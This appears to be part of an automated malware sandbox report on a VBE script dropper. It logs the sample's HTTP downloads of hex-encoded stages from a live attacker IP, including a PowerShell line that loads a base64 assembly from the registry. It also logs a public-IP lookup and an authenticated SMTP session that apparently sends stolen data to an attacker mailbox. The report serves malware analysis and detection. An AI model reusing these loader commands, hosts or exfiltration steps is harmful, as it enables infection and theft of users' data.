                                  Jan 15, 2025 10:20:12.433553934 CET49707587192.168.2.5162.254.34.31
                                  Jan 15, 2025 10:21:50.449656963 CET49707587192.168.2.5162.254.34.31
                                  Jan 15, 2025 10:21:50.454478979 CET58749707162.254.34.31192.168.2.5
                                  Jan 15, 2025 10:21:50.624938011 CET58749707162.254.34.31192.168.2.5
                                  Jan 15, 2025 10:21:50.624953985 CET58749707162.254.34.31192.168.2.5
                                  Jan 15, 2025 10:21:50.625164032 CET49707587192.168.2.5162.254.34.31
                                  Jan 15, 2025 10:21:50.627681017 CET49707587192.168.2.5162.254.34.31
                                  Jan 15, 2025 10:21:50.632592916 CET58749707162.254.34.31192.168.2.5

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 15, 2025 10:20:08.791902065 CET6328253192.168.2.51.1.1.1
                                  Jan 15, 2025 10:20:08.798651934 CET53632821.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 15, 2025 10:20:08.791902065 CET192.168.2.51.1.1.10x5953Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 15, 2025 10:20:08.798651934 CET1.1.1.1192.168.2.50x5953No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:20:08.798651934 CET1.1.1.1192.168.2.50x5953No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:20:08.798651934 CET1.1.1.1192.168.2.50x5953No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:20:10.878921032 CET1.1.1.1192.168.2.50xd650No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:20:10.878921032 CET1.1.1.1192.168.2.50xd650No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:20:18.895024061 CET1.1.1.1192.168.2.50x8618No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Jan 15, 2025 10:20:18.895024061 CET1.1.1.1192.168.2.50x8618No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:21:13.122576952 CET1.1.1.1192.168.2.50x8844No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Jan 15, 2025 10:21:13.122576952 CET1.1.1.1192.168.2.50x8844No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • api.ipify.org
                                  • 144.91.79.54

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704144.91.79.54805028C:\Windows\System32\wscript.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 15, 2025 10:20:00.628182888 CET152OUTGET /2412/s HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                  Host: 144.91.79.54
                                  Jan 15, 2025 10:20:01.281866074 CET1236INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:01 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                  Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                  ETag: "6ab0-6237452d358f3"
                                  Accept-Ranges: bytes
                                  Content-Length: 27312
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                                  Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                  Jan 15, 2025 10:20:01.281893969 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                  Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                  Jan 15, 2025 10:20:01.281929016 CET448INData Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                  Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                  Jan 15, 2025 10:20:01.281944036 CET1236INData Raw: 33 33 31 34 37 36 35 36 37 36 42 34 38 36 32 36 39 33 31 35 37 35 41 37 41 34 45 35 38 35 39 33 38 36 46 35 31 34 34 34 42 33 30 36 37 35 30 32 46 34 39 37 39 36 33 36 43 36 43 36 45 34 39 33 39 35 35 36 44 36 32 37 36 37 38 35 37 35 39 36 42 33
                                  Data Ascii: 3314765676B48626931575A7A4E5859386F51444B3067502F4979636C6C6E4939556D62767857596B355759304E48496967544C4752565669307A5A756C475A764E6D626C4269497734534D69306A62766C326379566D6467775762343944502F75373741414141414141414141414141456736414177516344
                                  Jan 15, 2025 10:20:01.281959057 CET1236INData Raw: 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34 31 34 33 34 32 34 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35
                                  Data Ascii: 74D414144417941414D414544417941414D4151474173425161415548414342414141554741744251594134454173425159413447417942515A41514841754251534145414153414152414141417741674C414144417541414D41344341784141414141414175427762416B47417A426763415547415742515A
                                  Jan 15, 2025 10:20:01.281974077 CET448INData Raw: 31 34 31 37 37 34 31 33 38 34 31 34 31 34 31 34 31 34 32 34 41 34 31 34 31 34 44 34 31 37 41 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                  Data Ascii: 14177413841414141424A41414D417A41414141414151414141414141414141414141414141414141414167414141614141414142415141414141414141414141414141414141414141414141414167414141414141514141414141414141414141414141414141414141674141414F41414141424151414141
                                  Jan 15, 2025 10:20:01.281990051 CET1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                  Data Ascii: 1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414145494155792F41414141414141417378475A7555575A793932597A314741756C57594E564765464A33624439464141414141414141414141
                                  Jan 15, 2025 10:20:01.282007933 CET1236INData Raw: 37 34 31 34 31 34 31 35 31 36 42 34 31 34 31 34 31 34 31 34 32 33 34 33 37 33 37 34 42 33 37 34 44 34 31 34 31 34 31 34 31 37 34 34 31 34 31 37 37 36 33 36 45 33 35 35 37 36 31 33 30 35 32 35 38 35 41 35 34 33 35 35 33 36 35 34 45 37 34 34 31 34
                                  Data Ascii: 7414141516B41414141423437374B374D4141414174414177636E3557613052585A543553654E74414142414241414D585A6A6C6D647956325569563256756B58544F4151415441414179563263563553654E6441414277414141343262705258596A6C476277425851756B58544F4151415441414179564764
                                  Jan 15, 2025 10:20:01.282021999 CET448INData Raw: 43 35 41 34 36 34 43 37 32 34 41 33 33 36 32 33 33 35 36 35 37 36 32 36 38 34 41 36 45 35 32 35 35 35 36 36 42 35 34 37 35 37 37 34 32 34 31 34 32 33 30 34 35 34 31 34 31 34 31 36 41 34 43 37 37 33 34 34 33 34 44 37 35 34 35 37 41 34 32 34 31 34
                                  Data Ascii: C5A464C724A336233565762684A6E5255566B54757742414230454141416A4C7734434D75457A42414541444141774E7A516A5A326754593449544F6C6C544C30677A4D69316959336B444E744D6D4E7863544C32517A4D6D5A7A4E3167444A4145514B4141414E79416A4D67415371434443646F645761796C
                                  Jan 15, 2025 10:20:01.282038927 CET1236INData Raw: 31 36 37 34 31 34 31 34 32 36 37 34 31 34 31 35 34 34 31 34 31 34 42 34 35 36 37 36 38 34 35 34 31 36 37 34 31 34 32 34 32 34 33 36 46 34 35 34 31 36 37 35 31 34 32 33 39 34 41 34 32 34 31 34 39 35 31 34 31 34 41 35 33 34 31 34 31 34 33 34 35 34
                                  Data Ascii: 1674141426741415441414B456768454167414242436F4541675142394A42414951414A5341414345456D4541674142494942414951414453414143454167485145514142417A424134424165455141516351615341414945346744634941414634514264454141466768454141414242436F45424541414745
                                  Jan 15, 2025 10:20:01.286901951 CET1236INData Raw: 32 34 31 34 38 35 31 35 31 35 39 35 33 34 35 37 37 34 32 34 35 36 37 36 37 34 35 34 32 36 33 34 31 34 32 34 31 34 44 34 32 34 31 36 37 35 31 34 31 34 34 35 33 34 35 37 37 34 32 34 35 35 31 36 39 34 35 34 32 36 37 36 39 34 35 35 36 35 39 35 31 35
                                  Data Ascii: 24148515159534577424567674542634142414D424167514144534577424551694542676945565951595345414B53556842494952416F4952464777674542676945565967444F346744425141494845554542454149463467444249414946495141424143424F45514167515145524551416755514141417941
                                  Jan 15, 2025 10:20:01.519419909 CET152OUTGET /2412/v HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                  Host: 144.91.79.54
                                  Jan 15, 2025 10:20:01.711056948 CET761INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:01 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                  Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                  ETag: "1de-622f3802a248c"
                                  Accept-Ranges: bytes
                                  Content-Length: 478
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                  Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                  Jan 15, 2025 10:20:01.714025974 CET152OUTGET /2412/r HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                  Host: 144.91.79.54
                                  Jan 15, 2025 10:20:01.904853106 CET1236INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:01 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                  Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                  ETag: "9800-62404d5968a93"
                                  Accept-Ranges: bytes
                                  Content-Length: 38912
                                  Keep-Alive: timeout=5, max=98
                                  Connection: Keep-Alive
                                  Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                  Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                  Jan 15, 2025 10:20:01.966480970 CET153OUTGET /2412/cn HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                  Host: 144.91.79.54
                                  Jan 15, 2025 10:20:02.157881975 CET347INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:02 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                  Last-Modified: Sat, 09 Nov 2024 16:14:35 GMT
                                  ETag: "42-6267d29e174cb"
                                  Accept-Ranges: bytes
                                  Content-Length: 66
                                  Keep-Alive: timeout=5, max=97
                                  Connection: Keep-Alive
                                  Data Raw: 35 33 37 34 36 46 37 30 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 44 34 45 36 31 36 44 36 35 32 30 36 33 36 46 36 45 36 38 36 46 37 33 37 34 32 30 32 44 34 36 36 46 37 32 36 33 36 35
                                  Data Ascii: 53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365
                                  Jan 15, 2025 10:20:02.335110903 CET155OUTGET /2412/file HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                  Host: 144.91.79.54
                                  Jan 15, 2025 10:20:02.528203011 CET1236INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:02 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                  Last-Modified: Fri, 10 Jan 2025 19:46:38 GMT
                                  ETag: "165a-62b5f5a682598"
                                  Accept-Ranges: bytes
                                  Content-Length: 5722
                                  Keep-Alive: timeout=5, max=96
                                  Connection: Keep-Alive
                                  Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 36 32 37 32 36 35 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 43 32 30 34 34 36 46 37 33 37 33 36 39 36 35 37 32 35 37 36 39 36 45 36 34 36 46 37 37 37 33 32 43 32 30 34 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 37 33 30 41 35 33 36 35 37 34 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 34 34 36 46 37 33 37 33 36 39 36 35 [TRUNCATED]
                                  Data Ascii: 4F7074696F6E204578706C696369740A0A27204E6F6D6272652064752070726F6A65743A207C706174687C0A27205661726961626C657320676C6F62616C65730A44696D205368656C6C4F626A65742C20446F737369657257696E646F77732C20436F6D7074657572497465726174696F6E730A536574205368656C6C4F626A6574203D204372656174654F626A6563742822575363726970742E5368656C6C22290A446F737369657257696E646F7773203D205368656C6C4F626A65742E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A272050726F6772616D6D65207072696E636970616C0A43616C6C20496E697469616C69736174696F6E28290A43616C6C20457865637574696F6E5072696E636970616C6528290A0A2720496E697469616C69736174696F6E2064657320706172616D65747265732064752070726F6772616D6D650A53756220496E697469616C69736174696F6E28290A20202020436F6D7074657572497465726174696F6E73203D20300A456E64205375620A0A2720526F7574696E65207072696E636970616C6520706F7572206765726572206C27657865637574696F6E2064752070726F6772616D6D650A53756220457865637574696F6E50726
                                  Jan 15, 2025 10:20:02.555111885 CET175OUTGET /2412/regOwiR4EFZZGKetHoUY.txt HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                  Host: 144.91.79.54
                                  Jan 15, 2025 10:20:02.750197887 CET1236INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:02 GMT
                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                  Last-Modified: Wed, 15 Jan 2025 07:37:59 GMT
                                  ETag: "75400-62bb9c1b5b45f"
                                  Accept-Ranges: bytes
                                  Content-Length: 480256
                                  Keep-Alive: timeout=5, max=95
                                  Connection: Keep-Alive
                                  Content-Type: text/plain
                                  Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                  Data Ascii: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549705104.26.13.2054432920C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-15 09:20:09 UTC155OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  2025-01-15 09:20:09 UTC425INHTTP/1.1 200 OK
                                  Date: Wed, 15 Jan 2025 09:20:09 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 9024c9cc5c5e36d4-YYZ
                                  server-timing: cfL4;desc="?proto=TCP&rtt=13717&min_rtt=13710&rtt_var=5147&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=212983&cwnd=32&unsent_bytes=0&cid=88de2783515a2fd7&ts=434&x=0"
                                  2025-01-15 09:20:09 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                  Data Ascii: 8.46.123.189


                                  SMTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jan 15, 2025 10:20:11.069066048 CET58749707162.254.34.31192.168.2.5220 server1.educt.shop ESMTP Postfix
                                  Jan 15, 2025 10:20:11.069391966 CET49707587192.168.2.5162.254.34.31EHLO 066656
                                  Jan 15, 2025 10:20:11.236325026 CET58749707162.254.34.31192.168.2.5250-server1.educt.shop
                                  250-PIPELINING
                                  250-SIZE 204800000
                                  250-ETRN
                                  250-STARTTLS
                                  250-AUTH PLAIN LOGIN
                                  250-AUTH=PLAIN LOGIN
                                  250-ENHANCEDSTATUSCODES
                                  250-8BITMIME
                                  250-DSN
                                  250 CHUNKING
                                  Jan 15, 2025 10:20:11.237112045 CET49707587192.168.2.5162.254.34.31AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
                                  Jan 15, 2025 10:20:11.404102087 CET58749707162.254.34.31192.168.2.5334 UGFzc3dvcmQ6
                                  Jan 15, 2025 10:20:11.581077099 CET58749707162.254.34.31192.168.2.5235 2.7.0 Authentication successful
                                  Jan 15, 2025 10:20:11.581388950 CET49707587192.168.2.5162.254.34.31MAIL FROM:<sendxsenses@vetrys.shop>
                                  Jan 15, 2025 10:20:11.752912998 CET58749707162.254.34.31192.168.2.5250 2.1.0 Ok
                                  Jan 15, 2025 10:20:11.753256083 CET49707587192.168.2.5162.254.34.31RCPT TO:<senses@vetrys.shop>
                                  Jan 15, 2025 10:20:11.924277067 CET58749707162.254.34.31192.168.2.5250 2.1.5 Ok
                                  Jan 15, 2025 10:20:11.924432993 CET49707587192.168.2.5162.254.34.31DATA
                                  Jan 15, 2025 10:20:12.096105099 CET58749707162.254.34.31192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                  Jan 15, 2025 10:20:12.096793890 CET49707587192.168.2.5162.254.34.31.
                                  Jan 15, 2025 10:20:12.378123999 CET58749707162.254.34.31192.168.2.5250 2.0.0 Ok: queued as CDEED60911
                                  Jan 15, 2025 10:21:50.449656963 CET49707587192.168.2.5162.254.34.31QUIT
                                  Jan 15, 2025 10:21:50.624938011 CET58749707162.254.34.31192.168.2.5221 2.0.0 Bye

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:04:19:59
                                  Start date:15/01/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0969686.vbe"
                                  Imagebase:0x7ff77db20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:04:20:01
                                  Start date:15/01/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs"
                                  Imagebase:0x7ff77db20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:3
                                  Start time:04:20:02
                                  Start date:15/01/2025
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                  Imagebase:0x7ff7be880000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:04:20:02
                                  Start date:15/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
